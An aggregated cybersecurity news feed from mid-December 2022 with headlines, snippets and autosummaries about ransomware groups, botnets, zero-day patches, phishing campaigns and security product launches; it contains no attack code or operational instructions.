                A Rust variant of a ransomware strain known as Agenda has been observed in the wild, making it the latest malware to adopt the cross-platform programming language after BlackCat, Hive, Luna, and RansomExx. Agenda, attributed to an operator named Qilin, is a ransomware-as-a-service (RaaS) group that has been linked to a spate of attacks primarily targeting manufacturing and IT industries across


                Glupteba Botnet Continues to Thrive Despite Google's Attempts to Disrupt It

                ransomware
                2022-12-19 https://thehackernews.com/2022/12/glupteba-botnet-continues-to-thrive.html
                The operators of the Glupteba botnet resurfaced in June 2022 as part of a renewed and "upscaled" campaign, months after Google disrupted the malicious activity. The ongoing attack is suggestive of the malware's resilience in the face of takedowns, cybersecurity company Nozomi Networks said in a write-up. "In addition, there was a tenfold increase in TOR hidden services being used as C2 servers

                Autosummary: One of those addresses, which was first active on June 1, 2022, has transacted 11 times to date and is used in as many as 1,197 artifacts, making it the most widely used wallet address.


                Experts spotted a variant of the Agenda Ransomware written in Rust

                exploits ransomware
                2022-12-19 https://securityaffairs.co/wordpress/139811/cyber-crime/agenda-ransomware-rust.html

                Researchers spotted a new variant of the Agenda ransomware which is written in the cross-platform programming language Rust. Trend Micro researchers have spotted a new variant of the Agenda ransomware (aka Qilin) that is written in Rust Language. The move follows the decision of other ransomware gangs, like Hive, Blackcat, RansomExx, and Luna, of rewriting their ransomware into […]

                The post Experts spotted a variant of the Agenda Ransomware written in Rust appeared first on Security Affairs.

                Autosummary: “It also added the -n, -p, fast, skip, and step flags on its configurations, which are not present in the Golang variant configuration and only used via command-line argument.”


                Ukraine's DELTA military system users targeted by info-stealing malware

                exploits
                2022-12-19 https://www.bleepingcomputer.com/news/security/ukraines-delta-military-system-users-targeted-by-info-stealing-malware/
                A compromised Ukrainian Ministry of Defense email account was found sending phishing emails and instant messages to users of the "DELTA" situational awareness program to infect systems with information-stealing malware. [...]


                Play ransomware claims attack on German hotel chain H-Hotels

                exploits ransomware
                2022-12-19 https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-german-hotel-chain-h-hotels/
                The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company. [...]

                Autosummary: The hotel chain employs 2,500 people and is one of the largest in the DACH region, operating under "H-Hotels" and the sub-brands Hyperion, H4 Hotels, H2 Hotels, H + Hotels, H.ostels, and H.omes.


                Microsoft: Achilles macOS bug lets hackers bypass Gatekeeper

                exploits
                2022-12-19 https://www.bleepingcomputer.com/news/security/microsoft-achilles-macos-bug-lets-hackers-bypass-gatekeeper/
                Apple has fixed a vulnerability that could be leveraged to deploy malware on vulnerable macOS devices via untrusted applications capable of bypassing Gatekeeper application execution restrictions. [...]

                Autosummary: More macOS security bypasses and malware: This is just one of multiple Gatekeeper bypasses found in the last several years, with many of them abused in the wild by attackers to circumvent macOS security mechanisms like Gatekeeper, File Quarantine, and System Integrity Protection (SIP) on fully patched Macs.


                Old vulnerabilities in Cisco products actively exploited in the wild

                exploits
                2022-12-19 https://securityaffairs.co/wordpress/139821/security/cisco-old-vulnerabilities-exploitation.html

                IT giant Cisco is warning of threat actors exploiting many old vulnerabilities in attacks in the wild. Cisco has updated multiple security advisories to warn of the active exploitation of several old vulnerabilities impacting its products. The bugs, some of which are rated as ‘critical’ severity, impact Cisco IOS, NX-OS, and HyperFlex software. Below are […]

                The post Old vulnerabilities in Cisco products actively exploited in the wild appeared first on Security Affairs.



                Microsoft finds macOS bug that lets malware bypass security checks

                exploits
                2022-12-19 https://www.bleepingcomputer.com/news/security/microsoft-finds-macos-bug-that-lets-malware-bypass-security-checks/
                Apple has fixed a vulnerability that could be leveraged to deploy malware on vulnerable macOS devices via untrusted applications capable of bypassing Gatekeeper application execution restrictions. [...]

                Autosummary: More macOS security bypasses and malware: This is just one of multiple Gatekeeper bypasses found in the last several years, with many of them abused in the wild by attackers to circumvent macOS security mechanisms like Gatekeeper, File Quarantine, and System Integrity Protection (SIP) on fully patched Macs.


                Week in review: Citrix and Fortinet RCEs, Microsoft fixes exploited zero-day

                exploits
                2022-12-18 https://www.helpnetsecurity.com/2022/12/18/week-in-review-citrix-and-fortinet-rces-microsoft-fixes-exploited-zero-day/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Vulnerability with public PoC affects Cisco IP phones, fix unavailable (CVE-2022-20968) A high-risk stack overflow vulnerability (CVE-2022-20968) may allow attackers to DoS or possibly even execute code remotely on Cisco 7800 and 8800 Series IP phones, the company has confirmed. Critical FortiOS pre-auth RCE vulnerability exploited by attackers (CVE-2022-42475) A critical RCE vulnerability (CVE-2022-42475) in Fortinet’s operating system, FortiOS, is … More

                The post Week in review: Citrix and Fortinet RCEs, Microsoft fixes exploited zero-day appeared first on Help Net Security.



                IBM and CSA help financial services manage risk and regulations

                financial
                2022-12-17 https://www.helpnetsecurity.com/2022/12/17/ibm-cloud-security-alliance/

                IBM has unveiled that it is working with the Cloud Security Alliance (CSA) to further advance security and risk management of cloud within financial services. Building on IBM’s mission to reduce risk for the industry with security, compliance and resiliency at the forefront, the IBM Cloud Framework for Financial Services is designed to help clients automate their security and compliance posture. The framework is central to IBM Cloud for Financial Services, a cloud with built-in … More

                The post IBM and CSA help financial services manage risk and regulations appeared first on Help Net Security.

                Autosummary: Leveraging the collective intelligence of the IBM Financial Services Cloud Council – a network of more than 120 financial services CIOs, CTOs, and Risk and Compliance officers such as Banco Bradesco, Nationwide, Banco Sabadell, Virgin Money and MUFG – the platform includes industry-informed and built-in controls that can help financial institutions meet their security and compliance requirements of this highly regulated industry.


                Glupteba malware is back in action after Google disruption

                exploits
                2022-12-17 https://www.bleepingcomputer.com/news/security/glupteba-malware-is-back-in-action-after-google-disruption/
                The Glupteba malware botnet has sprung back into action, infecting devices worldwide after its operation was disrupted by Google almost a year ago. [...]

                Autosummary: Figure: from left to right, 2022 (most complex), 2021, 2020, and 2019 campaigns (Nozomi). Additionally, the number of TOR hidden services used as C2 servers has grown ten times since the 2021 campaign, following a similar redundancy approach.


                Executives take more cybersecurity risks than office workers

                ciber
                2022-12-16 https://www.helpnetsecurity.com/2022/12/16/executives-take-more-cybersecurity-risks-than-office-workers/

                Ivanti worked with cybersecurity experts and surveyed 6,500 executive leaders, cybersecurity professionals, and office workers to understand the perception of today’s cybersecurity threats and find out how companies are preparing for yet-unknown future threats. The report revealed that despite 97% of leaders and security professionals reporting their organization is as prepared or more prepared to defend against cybersecurity attacks than they were a year ago, one in five wouldn’t bet a chocolate bar they could … More

                The post Executives take more cybersecurity risks than office workers appeared first on Help Net Security.



                Malwarebytes strengthens threat prevention capabilities in Nebula platform

                exploits
                2022-12-16 https://www.helpnetsecurity.com/2022/12/16/malwarebytes-nebula/

                Malwarebytes expands Malwarebytes Nebula platform with additional threat prevention capabilities developed specifically for resource constrained organizations to reduce attack surfaces from a simple, easy-to-use cloud-based interface. The company released Cloud Storage Scanning (CSS) to also protect business-critical assets stored in the cloud and prevent the introduction of malware and other threats into digital ecosystems. “In our evolution from endpoint product to a holistic protection platform, we’re seeing strong adoption of our new threat prevention modules … More

                The post Malwarebytes strengthens threat prevention capabilities in Nebula platform appeared first on Help Net Security.

                Autosummary: Malwarebytes’ cloud-based Nebula platform delivers centralized management of endpoint protection (EP) and endpoint detection and response (EDR), which removes all traces of threats (such as malware), eradicating the residual files and/or code that other solutions miss.


                Keysight introduces APS-M8400 Modular Network Cybersecurity Test Platform

                ciber
                2022-12-16 https://www.helpnetsecurity.com/2022/12/16/keysight-aps-m8400-modular-network-cybersecurity-test-platform/

                Keysight Technologies announced the new APS-M8400 Modular Network Cybersecurity Test Platform, which provides data center network equipment manufacturers (NEM) and operators with the high density 8-port 400GE Quad Small Form Factor Pluggable Double Density (QSFP-DD) network security test platform. Data center operators and service providers are facing exponential growth in encrypted traffic volumes and security threats driven by increases in video streaming, cloud computing, artificial intelligence (AI), machine learning (ML), and internet of things (IoT) … More

                The post Keysight introduces APS-M8400 Modular Network Cybersecurity Test Platform appeared first on Help Net Security.

                Autosummary: “Fortinet is the only vendor delivering 400GE interface speeds on a hyperscale firewall via the FortiGate 7121F, 4800F, and 3700F. Keysight’s groundbreaking 8x400GE APS-M8400 cybersecurity test platform delivers the port density, multi-terabit application and TLS throughput rates, and session scalability that help Fortinet test and validate the performance and real-time threat protection our customers expect.”


                CISA Alert: Veeam Backup and Replication Vulnerabilities Being Exploited in Attacks

                exploits
                2022-12-16 https://thehackernews.com/2022/12/cisa-alert-veeam-backup-and-replication.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation in the wild. The now-patched critical flaws, tracked as CVE-2022-26500 and CVE-2022-26501, are both rated 9.8 on the CVSS scoring system, and could be leveraged to


                CISA adds Veeam Backup and Replication bugs to Known Exploited Vulnerabilities Catalog

                exploits
                2022-12-16 https://securityaffairs.co/wordpress/139731/hacking/veeam-backup-known-exploited-vulnerabilities-catalog.html

                US CISA added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities impacting Veeam Backup & Replication software, tracked as CVE-2022-26500 and CVE-2022-26501 (CVSS 3.1 Base Score 9.8), to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant […]

                The post CISA adds Veeam Backup and Replication bugs to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.



                Trojanized Windows 10 Installer Used in Cyberattacks Against Ukrainian Government Entities

                exploits government ciber
                2022-12-16 https://thehackernews.com/2022/12/trojanized-windows-10-installer-used-in.html
                Government entities in Ukraine have been breached as part of a new campaign that leveraged trojanized versions of Windows 10 installer files to conduct post-exploitation activities. Mandiant, which discovered the supply chain attack around mid-July 2022, said the malicious ISO files were distributed via Ukrainian- and Russian-language Torrent websites. It's tracking the threat cluster as UNC4166

                Autosummary: These included Stowaway, an open source proxy tool, Cobalt Strike Beacon, and SPAREPART, a lightweight backdoor programmed in C, enabling the threat actor to execute commands, harvest data, capture keystrokes and screenshots, and export the information to a remote server.


                Microsoft warns of new Minecraft DDoS malware infecting Windows, Linux

                exploits
                2022-12-16 https://www.bleepingcomputer.com/news/security/microsoft-warns-of-new-minecraft-ddos-malware-infecting-windows-linux/
                A new cross-platform malware botnet named "MCCrash" is infecting Windows, Linux, and IoT devices to conduct distributed denial of service attacks on Minecraft servers. [...]

                Autosummary: Currently, most of the devices infected by MCCrash are located in Russia, but there are also victims in Mexico, Italy, India, Kazakhstan, and Singapore.


                Data breach at Social Blade confirmed. Hacker offers to sell database on underground website

                financial
                2022-12-16 https://www.bitdefender.com/blog/hotforsecurity/data-breach-at-social-blade-confirmed-hacker-offers-to-sell-database-on-underground-website/
                Social media analytics service Social Blade has confirmed that it is investigating a security breach, after a hacker offered its user database for sale on an underground criminal website. Read more in my article on the Hot for Security blog.


                Microsoft fixes Windows taskbar bug causing Explorer, Office freezes

                exploits
                2022-12-16 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-taskbar-bug-causing-explorer-office-freezes/
                Microsoft says that Windows 10 updates released in late September are causing Windows taskbar flicker issues and app instability. [...] "



                Colombian energy supplier EPM hit by BlackCat ransomware attack

                exploits latam ransomware industry
                2022-12-16 https://www.bleepingcomputer.com/news/security/colombian-energy-supplier-epm-hit-by-blackcat-ransomware-attack/
                Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services. [...]

                Autosummary: BlackCat ransomware behind the attack: BleepingComputer has since learned that the BlackCat ransomware operation, aka ALPHV, was behind the attacks, claiming to have stolen corporate data during the attacks.


                Patch Tuesday: Two zero-day flaws in Windows need immediate attention

                exploits
                2022-12-16 https://www.computerworld.com/article/3683593/patch-tuesday-two-zero-day-flaws-in-windows-zero-days-immediate-attention.html#tk.rss_security

                Microsoft's December Patch Tuesday update delivers 59 fixes, including two zero-days (CVE-2022-44698 and CVE-2022-44710) that require immediate attention on the Windows platform. This is a network-focused update (TCP/IP and RDP) that will require significant testing with an emphasis on ODBC connections, Hyper-V systems, Kerberos authentication, and printing (both local and remote).

                Microsoft also published an urgent out-of-band update (CVE-2022-37966) to address serious Kerberos authentication issues. (The team at Readiness has provided a helpful infographic that outlines the risks associated with each of these updates.)


                "

                Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET Core and Chakra Core); Adobe (retired???, maybe next year). Browsers: Following a welcome trend of no critical updates to Microsoft's browsers, this update delivers just three (CVE-2022-44668, CVE-2022-44708 and CVE-2022-41115), all rated important. Windows: Microsoft released patches to the Windows ecosystem this month that address three critical updates (CVE-2022-44676, CVE-2022-44670, and CVE-2022-41076), with 24 rated important and two rated moderate. Hyper-V: After installing this update on Hyper-V hosts managed by SDN-configured System Center Virtual Machine Manager (VMM), you might receive an error on workflows involving creating a new Network Adapter (also called a Network Interface Card or NIC) joined to a VM network or a new Virtual Machine (VM). As this is an end-of-year update, there are quite a few "End of Service" changes, including: Windows 10 (Enterprise, Home, Pro) 21H2 - Dec. 12, 2022.


                The Week in Ransomware - December 16th 2022 - Losing Trust

                exploits ransomware
                2022-12-16 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-16th-2022-losing-trust/
                Today's Week in Ransomware brings you the latest news and stories about the cyberattacks, new tactics, and reports related to ransomware operations. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @struppigel, @VK_Intel, @billtoulas, @FourOctets, @jorntvdw, @BleepinComputer, @DanielGallagher, @demonslay335, @malwrhunterteam, @fwosar, @Seifreed, @serghei, @malwareforme, @Ionut_Ilascu, @LawrenceAbrams, @PolarToffee, @_CPResearch_, @vinopaljiri, @cybereason, @1ZRR4H, @TalosSecurity, @pcrisk, @TrendMicro, @GeeksCyber, and @Digitaleragroup. December 11th 2022: Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence. This year, ransomware-as-a-service (RaaS) groups like BlackCat, Hive, and RansomExx have developed versions of their ransomware in Rust, a cross-platform language that makes it easier to tailor malware to different operating systems like Windows and Linux.


                InfraGard infiltrated by cybercriminal

                ciber
                2022-12-16 https://www.malwarebytes.com/blog/news/2022/12/infragard-infiltrated-by-cybercriminal

                Categories: News. Tags: InfraGard, FBI, critical infrastructure, data breach, USDoD, Breach, escrow service

                A partnership between the FBI and private sector members established to protect US critical infrastructure, called InfraGard, was infiltrated by a cybercriminal.


                The post InfraGard infiltrated by cybercriminal appeared first on Malwarebytes Labs.

                "

                Autosummary: InfraGard's membership includes business executives, entrepreneurs, lawyers, security personnel, military and government officials, IT professionals, academia, and state and local law enforcement.


                Virtual kidnapping scam strikes again. Spot the signs

                financial
                2022-12-16 https://www.malwarebytes.com/blog/news/2022/12/virtual-kidnapping-scam-strikes-again-spot-the-signs

                Categories: News. Tags: virtual kidnapping, kidnap, scam, fake, fraud, ransom, victim, wire transfer, digital payment, venmo, cashapp, social engineering, phone call, mobile, relative

                A recent scam has been making the rounds that attempts to fool you into thinking a loved one has been kidnapped.


                The post Virtual kidnapping scam strikes again. Spot the signs appeared first on Malwarebytes Labs.

                "

                Autosummary: With this in mind, we have some tips and suggestions for you: Revisit your online presence, and lock down or delete as appropriate in relation to locations, names, and phone numbers. When fraudsters get vocal: As for "using your relative's voice", well, no. Don't panic. There are other tips online sourced from law enforcement, mostly in relation to asking to speak to your supposedly kidnapped relative, trying to contact them by other means while the scammers are on the line, and slowing the situation down to allow you to try and contact the kidnapee in the first place.


                Update now! Apple patches active exploit vulnerability for iPhones

                exploits
                2022-12-16 https://www.malwarebytes.com/blog/news/2022/12/update-now-apple-patches-active-exploit-vulnerability-for-iphones

                Categories: Exploits and vulnerabilities, News. Tags: Apple, iOS 16.1.2, Safari 16.2, CVE-2022-42856, type confusion

                Apple has released new security content for iOS 16.1.2 and Safari 16.2 to fix a zero-day security vulnerability that was actively exploited.


                The post Update now! Apple patches active exploit vulnerability for iPhones appeared first on Malwarebytes Labs.

                "

                Autosummary: Another clue was given when Apple revealed that security researchers at Google's Threat Analysis Group, which investigates nation state-backed spyware, hacking, and cyberattacks, discovered and reported the WebKit bug. "Still, Apple has been known to back-port fixes when they're aware of active attacks on an older system, so I doubt it's just a matter of falling back on a disclaimer."


                Patch Tuesday: Two zero-day flaws in Windows need immediate attention

                exploits
                2022-12-16 https://www.computerworld.com/article/3683593/patch-tuesday-two-zero-day-flaws-in-windows-need-immediate-attention.html#tk.rss_security

                Microsoft's December Patch Tuesday update delivers 59 fixes, including two zero-days (CVE-2022-44698 and CVE-2022-44710) that require immediate attention on the Windows platform. This is a network-focused update (TCP/IP and RDP) that will require significant testing with an emphasis on ODBC connections, Hyper-V systems, Kerberos authentication, and printing (both local and remote).

                Microsoft also published an urgent out-of-band update (CVE-2022-37966) to address serious Kerberos authentication issues. (The team at Readiness has provided a helpful infographic that outlines the risks associated with each of these updates.)


                "

                Autosummary: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET Core and Chakra Core); Adobe (retired???, maybe next year). Browsers: Following a welcome trend of no critical updates to Microsoft's browsers, this update delivers just three (CVE-2022-44668, CVE-2022-44708 and CVE-2022-41115), all rated important. Windows: Microsoft released patches to the Windows ecosystem this month that address three critical updates (CVE-2022-44676, CVE-2022-44670, and CVE-2022-41076), with 24 rated important and two rated moderate. Hyper-V: After installing this update on Hyper-V hosts managed by SDN-configured System Center Virtual Machine Manager (VMM), you might receive an error on workflows involving creating a new Network Adapter (also called a Network Interface Card or NIC) joined to a VM network or a new Virtual Machine (VM). As this is an end-of-year update, there are quite a few "End of Service" changes, including: Windows 10 (Enterprise, Home, Pro) 21H2 - Dec. 12, 2022.


                Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs

                industry
                2022-12-15 https://www.helpnetsecurity.com/2022/12/15/product-showcase-searchable-encryption-ironcore-labs/

                When it comes to sensitive data, search services are the ultimate treasure trove for hackers. Why slowly sift through information when a search service has indexed it all for you? Mistakes are inevitable and cloud misconfigurations are the number one cause of data breaches. The number two cause is when insider credentials are stolen. In either case, having your sensitive data encrypted can provide the defense-in-depth you need to prevent a mistake from becoming a … More

                The post Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs appeared first on Help Net Security.

                "

                Autosummary: Quick look: What you need to know about Cloaked Search. Cloaked Search is a transparent proxy that encrypts data before it goes to Elasticsearch or OpenSearch while still allowing you to search that data; no plugins required. Choose which indices and fields to encrypt while the rest pass through normally, so you can start with your most sensitive data and expand over time. Perfect as a PET (privacy enhancing technology) for safeguarding personal information and complying with global privacy laws and data sovereignty concerns. Protects against breaches, unauthorized insider access, injection attacks, and cloud misconfigurations. How Cloaked Search works: Cloaked Search uses encryption-in-use techniques to allow searching over encrypted data without decrypting it. Supported search functionality: All of the advanced search functionality you rely on remains available to you over the Cloaked Search encrypted data, including field matching, phonetic matching, exact phrase matching, boolean queries, subdocument searches, autocompletion, wildcard searches, field boosting, and more.


                5 tips for building a culture of cybersecurity accountability

                ciber
                2022-12-15 https://www.helpnetsecurity.com/2022/12/15/5-tips-for-building-a-culture-of-cybersecurity-accountability-video/

                In this Help Net Security video, Corey Nachreiner, CSO at WatchGuard, talks about how effective cybersecurity often boils down to doing the basics: patching, updating, and following day-to-day best practices for using applications and systems. However, sometimes this knowledge stays within the network admin/cybersecurity teams and fails to make it to “regular employees,” creating a company culture that’s susceptible to attack rather than a culture of accountability.

                The post 5 tips for building a culture of cybersecurity accountability appeared first on Help Net Security.

                "



                Distractions at work can have serious cybersecurity implications

                ciber
                2022-12-15 https://www.helpnetsecurity.com/2022/12/15/distracted-employees-cybersecurity/

                Distracted employees are twice as likely to do the bare minimum for security at work, according to 1Password. The findings reveal that sustained burnout, now paired with high levels of distraction, has critical implications for workplace security. “While we hope the worst of the pandemic is behind us, world events continue to unsettle and distract employees. Mishaps are inevitable – it’s not a case of if world distractions will make employees more vulnerable to human … More

                The post Distractions at work can have serious cybersecurity implications appeared first on Help Net Security.

                "

                Autosummary: A perfect storm: Top distractions include the Covid-19 pandemic (44%), recession/inflation (42%), economic uncertainty (38%), gas prices (34%), and personal relationships (29%). Nearly 9 in 10 employees (89%) now use authentication products or services such as two-factor (2FA) or multi-factor authentication (MFA), biometrics, password managers and single sign-on.


                Hacking Using SVG Files to Smuggle QBot Malware onto Windows Systems

                exploits
                2022-12-15 https://thehackernews.com/2022/12/hacking-using-svg-files-to-smuggle-qbot.html
                Phishing campaigns involving the Qakbot malware are using Scalable Vector Graphics (SVG) images embedded in HTML email attachments. The new distribution method was spotted by Cisco Talos, which said it identified fraudulent email messages featuring HTML attachments with encoded SVG images that incorporate HTML script tags. HTML smuggling is a technique that relies on using legitimate features of



                Crooks use HTML smuggling to spread QBot malware via SVG files

                exploits
                2022-12-15 https://securityaffairs.co/wordpress/139658/cyber-crime/qbot-html-smuggling-svg.html

                Talos researchers uncovered a phishing campaign distributing the QBot malware to Windows systems using SVG files. Talos researchers uncovered a phishing campaign distributing the QBot malware using a new technique that leverages Scalable Vector Graphics (SVG) images embedded in HTML email attachments. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 […]

                The post Crooks use HTML smuggling to spread QBot malware via SVG files appeared first on Security Affairs.

                "

                Autosummary: Once a victim receives the email and opens the attachment, their browser decodes and runs the embedded script, which then assembles a malicious payload directly on the victim's device.


                Android Malware Campaign Leverages Money-Lending Apps to Blackmail Victims

                financial exploits
                2022-12-15 https://thehackernews.com/2022/12/android-malware-campaign-leverages.html
                A previously undocumented Android malware campaign has been observed leveraging money-lending apps to blackmail victims into paying up with personal information stolen from their devices. Mobile security company Zimperium dubbed the activity MoneyMonger, pointing out the use of the cross-platform Flutter framework to develop the apps. MoneyMonger "takes advantage of Flutter's framework to

                Autosummary: The collected data – which includes GPS locations, SMSes, contacts, call logs, files, photos, and audio recordings – is then used as a pressure tactic to force victims into paying excessively high-interest rates for the loans, sometimes even in cases after the loan is repaid.


                Phishing attack uses Facebook posts to evade email security

                financial
                2022-12-15 https://www.bleepingcomputer.com/news/security/phishing-attack-uses-facebook-posts-to-evade-email-security/
                A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII). [...]

                Autosummary: Facebook post masqueraded as a support page (Trustwave). However, this post includes a link to an external phishing site named after Meta, Facebook's owner company, to slightly reduce the chances of victims realizing the scam.


                Ukrainian govt networks breached via trojanized Windows 10 installers

                exploits
                2022-12-15 https://www.bleepingcomputer.com/news/security/ukrainian-govt-networks-breached-via-trojanized-windows-10-installers/
                Ukrainian government entities were hacked in targeted attacks after their networks were first compromised via trojanized ISO files posing as legitimate Windows 10 installers. [...]

                Autosummary: After the initial reconnaissance, the threat actors also deployed Stowaway, Beacon, and Sparepart backdoors that allowed them to maintain access to the compromised computers, execute commands, transfer files, and steal information, including credentials and keystrokes.


                LEGO BrickLink bugs let hackers hijack accounts, breach servers

                exploits
                2022-12-15 https://www.bleepingcomputer.com/news/security/lego-bricklink-bugs-let-hackers-hijack-accounts-breach-servers/
                Security analysts have discovered two API security vulnerabilities in BrickLink.com, LEGO Group's official second-hand and vintage marketplace for LEGO bricks. [...]



                Hackers target Japanese politicians with new MirrorStealer malware

                exploits
                2022-12-15 https://www.bleepingcomputer.com/news/security/hackers-target-japanese-politicians-with-new-mirrorstealer-malware/
                A hacking group tracked as MirrorFace has been targeting Japanese politicians for weeks before the House of Councilors election in July 2022, using a previously undocumented credentials stealer named "MirrorStealer." [...]

                Autosummary: Spearphishing attacks: The MirrorFace hacking group (APT10 and Cicada) began sending spear-phishing emails to their targets on June 29, 2022, pretending to be PR agents from the recipient's political party, asking them to post the attached video files on social media.


                Microsoft approved and digitally-signed malicious drivers used in ransomware attacks

                exploits ransomware
                2022-12-15 https://www.bitdefender.com/blog/hotforsecurity/microsoft-approved-and-digitally-signed-malicious-drivers-used-in-ransomware-attacks/
                Microsoft has warned that malicious hackers were able to get the software giant to digitally sign their code so it could be used in attacks, such as the deployment of ransomware. Read more in my article on the Hot for Security blog.



                Microsoft Reclassifies SPNEGO Extended Negotiation Security Vulnerability as "Critical"

                exploits
                2022-12-15 https://thehackernews.com/2022/12/microsoft-reclassifies-spnego-extended.html
                Microsoft has revised the severity of a security vulnerability it originally patched in September 2022, upgrading it to "Critical" after it emerged that it could be exploited to achieve remote code execution. Tracked as CVE-2022-37958 (CVSS score: 8.1), the flaw was previously described as an information disclosure vulnerability in SPNEGO Extended Negotiation (NEGOEX) Security Mechanism. SPNEGO,



                FuboTV says World Cup streaming outage caused by a cyberattack

                ciber
                2022-12-15 https://www.bleepingcomputer.com/news/security/fubotv-says-world-cup-streaming-outage-caused-by-a-cyberattack/
                FuboTV has confirmed that a streaming outage preventing subscribers from watching the World Cup Qatar 2022 semifinal match between France and Morocco was caused by a cyberattack. [...]

                Autosummary: "On December 14, 2022, the day of the Qatar 2022™ semifinal match between France and Morocco, many FuboTV customers experienced issues accessing their accounts," reads a statement posted to FuboTV's website.


                Microsoft fixes bug that made Task Manager partially unreadable

                exploits
                2022-12-15 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-that-made-task-manager-partially-unreadable/
                Microsoft has addressed a known issue that made parts of the Task Manager unreadable after installing the KB5020044 November preview update on Windows 11 22H2 systems. [...]



                CyberData Pros and RiskRecon launch global cybersecurity protection for businesses

                ciber
                2022-12-14 https://www.helpnetsecurity.com/2022/12/14/cyberdata-pros-riskrecon/

                CyberData Pros collaborates with RiskRecon, a Mastercard Company, to provide threat prevention services for clients worldwide. Specializing in data security, compliance, consulting and due diligence, CDP analysts provide solution-oriented awareness and implementation routes to improve and eliminate security risks for clients. RiskRecon is a SaaS platform that analyzes a company’s internet-facing assets for cyber risks. RiskRecon cybersecurity ratings and insights make it easy for a company to understand and act based on the risks found … More

                The post CyberData Pros and RiskRecon launch global cybersecurity protection for businesses appeared first on Help Net Security.

                "



                How companies can avoid costly data breaches

                financial
                2022-12-14 https://www.helpnetsecurity.com/2022/12/14/how-companies-can-avoid-costly-data-breaches-video/

                IBM found that it takes on average 277 days to discover a security breach and costs businesses an average of $4.35 million per breach. Moreover, the time-to-discovery can blindside companies, and with a recession looming, this is not the time for them to be unprepared. In this Help Net Security video, Balaji Ganesan, CEO at Privacera, talks about how organizations are moving to a zero-trust framework and beyond, meaning they have security frameworks that span … More

                The post How companies can avoid costly data breaches appeared first on Help Net Security.

                "



                Searchlight Security Ransomware Search and Insights collates dark web data on ransomware groups

                exploits ransomware
                2022-12-14 https://www.helpnetsecurity.com/2022/12/14/searchlight-security-ransomware-search-and-insights/

                Searchlight Security launched Ransomware Search and Insights, a new strategic enhancement to its Cerberus platform. Ransomware Search and Insights automatically collates data from active ransomware groups to help organizations and law enforcement agencies to investigate, track, and gather intelligence on live ransomware activity. This curated view of ransomware groups means that patterns in tactics, incidents, and victimology can be observed in real-time, helping analysts to bolster their threat intelligence, and gain the upper hand on … More

                The post Searchlight Security Ransomware Search and Insights collates dark web data on ransomware groups appeared first on Help Net Security.

                "

                Autosummary: This curated view of ransomware groups means that patterns in tactics, incidents, and victimology can be observed in real-time, helping analysts to bolster their threat intelligence, and gain the upper hand on ransomware groups.


                Hackers Actively Exploiting Citrix ADC and Gateway Zero-Day Vulnerability

                exploits
                2022-12-14 https://thehackernews.com/2022/12/hackers-actively-exploiting-citrix-adc.html
                The U.S. National Security Agency (NSA) on Tuesday said a threat actor tracked as APT5 has been actively exploiting a zero-day flaw in Citrix Application Delivery Controller (ADC) and Gateway to take over affected systems. The critical remote code execution vulnerability, identified as CVE-2022-27518, could allow an unauthenticated attacker to execute commands remotely on vulnerable devices and

                Autosummary: CVE-2022-31702 (CVSS score: 9.8) - Command injection vulnerability in vRNI; CVE-2022-31703 (CVSS score: 7.5) - Directory traversal vulnerability in vRNI; CVE-2022-31705 (CVSS score: 5.9/9.3) -


                New Actively Exploited Zero-Day Vulnerability Discovered in Apple Products

                exploits
                2022-12-14 https://thehackernews.com/2022/12/new-actively-exploited-zero-day.html
                Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code. Tracked as CVE-2022-42856, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to

                Autosummary: An application may be able to execute arbitrary code with kernel privileges. The latest iOS, iPadOS, and macOS updates also introduce a new security feature called Advanced Data Protection for iCloud that expands end-to-end encryption (E2EE) to iCloud Backup, Notes, Photos, and more.


                VMware fixed critical VM Escape bug demonstrated at Geekpwn hacking contest

                exploits
                2022-12-14 https://securityaffairs.co/wordpress/139616/security/vmware-vm-escape-flaw-geekpwn.html

                VMware fixed three flaws in multiple products, including a virtual machine escape issue exploited at the GeekPwn 2022 hacking competition. VMware addressed three vulnerabilities in multiple products, including a virtual machine escape flaw, tracked as CVE-2022-31705, that was exploited at the GeekPwn 2022 hacking competition. A working exploit for the CVE-2022-31705 vulnerability was demonstrated by […]

                The post VMware fixed critical VM Escape bug demonstrated at Geekpwn hacking contest appeared first on Security Affairs.

                "



                Ransomware Attackers Use Microsoft-Signed Drivers to Gain Access to Systems

                exploits
                2022-12-14 https://thehackernews.com/2022/12/ransomware-attackers-use-microsoft.html
